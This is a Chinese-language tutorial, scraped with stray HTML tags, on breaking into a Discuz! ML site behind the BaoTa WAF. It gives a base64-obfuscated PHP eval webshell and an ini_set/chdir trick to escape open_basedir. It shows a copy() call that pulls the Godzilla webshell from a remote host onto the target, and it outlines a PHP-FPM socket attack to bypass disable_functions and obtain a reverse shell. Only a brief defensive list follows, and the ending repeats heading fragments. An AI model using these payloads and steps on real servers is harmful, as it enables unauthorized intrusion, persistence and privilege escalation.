利用哥斯拉马绕过宝塔WAF及disable_functions的渗透测试教学<\/h1>

1. 环境概述<\/h2>

本次渗透测试的目标环境：<\/p>

主站：Discuz! ML 3.4搭建的违法招嫖网站<\/li>
防护：配置有宝塔WAF<\/li>
关联系统：同服务器上运行某某发卡网（用于充值）<\/li>
服务器环境：Nginx + PHP 5.6<\/li>

安全限制：宝塔默认设置了open_basedir和disable_functions<\/li> <\/ul>

2. 初始渗透<\/h2>

2.1 漏洞利用尝试<\/h3>

首先尝试利用Discuz! ML 3.X的已知漏洞进行攻击，但未成功<\/li>

发现主站外链的发卡网与主站共享同一IP，可作为突破口<\/li> <\/ul>

2.2 WebShell写入<\/h3>

由于存在宝塔WAF，直接写入WebShell需要变形处理：<\/p>

<?<\/span>php<\/span> @<\/span>eval<\/span>(base64_decode<\/span>($_POST['yanshu'<\/span>]));?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
使用base64编码绕过WAF检测<\/li>
通过POST参数'yanshu'传递base64编码的命令<\/li>
<\/ul>
3. 绕过open_basedir限制<\/h2>
3.1 利用ini_set()函数<\/h3>
通过以下代码片段可以绕过open_basedir限制：<\/p>
eval<\/span>("
<\/span><\/span><\/span>    mkdir('1');
<\/span><\/span><\/span>    chdir('1');
<\/span><\/span><\/span>    ini_set('open_basedir','..');
<\/span><\/span><\/span>    chdir('..');chdir('..');chdir('..');
<\/span><\/span><\/span>    chdir('..');chdir('..');chdir('..');
<\/span><\/span><\/span>    ini_set('open_basedir','\/');
<\/span><\/span><\/span>    var_dump(scandir('\/www\/wwwroot'));
<\/span><\/span><\/span>"<\/span>);
<\/span><\/span><\/code><\/pre>3.2 操作步骤<\/h3>

创建一个临时目录('1')<\/li>
进入该目录<\/li>
使用ini_set()修改open_basedir为上级目录('..')<\/li>
多次返回上级目录<\/li>
最后将open_basedir设置为根目录('\/')<\/li>
使用scandir()函数列出目录内容<\/li>
<\/ol>
4. 使用哥斯拉WebShell管理<\/h2>
4.1 哥斯拉马优势<\/h3>

自动实现open_basedir绕过<\/li>
加密通信流量，避免被WAF拦截<\/li>
提供丰富的后续渗透功能<\/li>
<\/ul>
4.2 部署方法<\/h3>
使用copy命令将哥斯拉马从远程服务器复制到目标服务器：<\/p>
copy<\/span>('http:\/\/xxxx\/g.php'<\/span>,'\/www\/wwwroot\/xxx.com\/g.php'<\/span>);
<\/span><\/span><\/code><\/pre>
加密器选择：PHP_EVAL_XOR_BASE64<\/li>
路径根据实际环境调整<\/li>
<\/ul>
5. 绕过disable_functions限制<\/h2>
5.1 环境限制分析<\/h3>
目标环境禁用了以下关键函数：<\/p>

putenv()<\/li>
mail()<\/li>
pcntl_exec()<\/li>
其他常规bypass方法受限（PHP 5.6环境）<\/li>
<\/ul>
5.2 攻击PHP-FPM方法<\/h3>
5.2.1 定位PHP-FPM配置<\/h4>


查找php-fpm.conf配置文件路径：<\/p>

\/www\/server\/php\/56\/etc\/php-fpm.conf<\/code><\/li>
或通过nginx配置查找<\/li>
<\/ul>
<\/li>

获取PHP-FPM的socket位置：<\/p>

通常为：unix:\/tmp\/php-cgi-56.sock<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
5.2.2 攻击步骤<\/h4>

使用哥斯拉马的"PAttackFPM"模块<\/li>
加载并执行攻击模块<\/li>
在哥斯拉马的bypass disable_functions模块中执行命令<\/li>
<\/ol>
5.3 获取反弹Shell<\/h3>
成功绕过限制后，可以：<\/p>

执行系统命令<\/li>
获取反弹Shell<\/li>
进行后续提权操作<\/li>
<\/ol>
6. 参考资源<\/h2>
PHP-FPM攻击原理参考：

https:\/\/blog.csdn.net\/qq_38154820\/article\/details\/106330106<\/a><\/p>
7. 关键点总结<\/h2>

WAF绕过<\/strong>：使用base64编码变形WebShell代码<\/li>
目录限制绕过<\/strong>：利用ini_set()和目录跳转技巧<\/li>
工具选择<\/strong>：哥斯拉马的PHP_EVAL_XOR_BASE64加密器<\/li>
函数限制绕过<\/strong>：攻击PHP-FPM服务<\/li>
信息收集<\/strong>：通过nginx和php-fpm配置获取关键路径<\/li>
持久化<\/strong>：通过写入WebShell维持访问<\/li>
<\/ol>
8. 防御建议<\/h2>

定期更新系统和应用补丁<\/li>
限制ini_set()等危险函数的使用<\/li>
监控\/tmp目录下的异常socket文件<\/li>
对PHP-FPM服务进行适当加固<\/li>
实施更严格的WAF规则，检测base64变形攻击<\/li>
定期检查服务器上的异常文件<\/li>
<\/ol>

利用哥斯拉马绕过宝塔WAF及disable_functions的渗透测试教学<\/h1>

2. 初始渗透<\/h2>

3. 绕过open_basedir限制<\/h2>

4. 使用哥斯拉WebShell管理<\/h2>

5. 绕过disable_functions限制<\/h2>

5.2 攻击PHP-FPM方法<\/h3>

6. 参考资源<\/h2> PHP-FPM攻击原理参考： https:\/\/blog.csdn.net\/qq_38154820\/article\/details\/106330106<\/a><\/p>

6. 参考资源<\/h2>
PHP-FPM攻击原理参考：
https:\/\/blog.csdn.net\/qq_38154820\/article\/details\/106330106<\/a><\/p>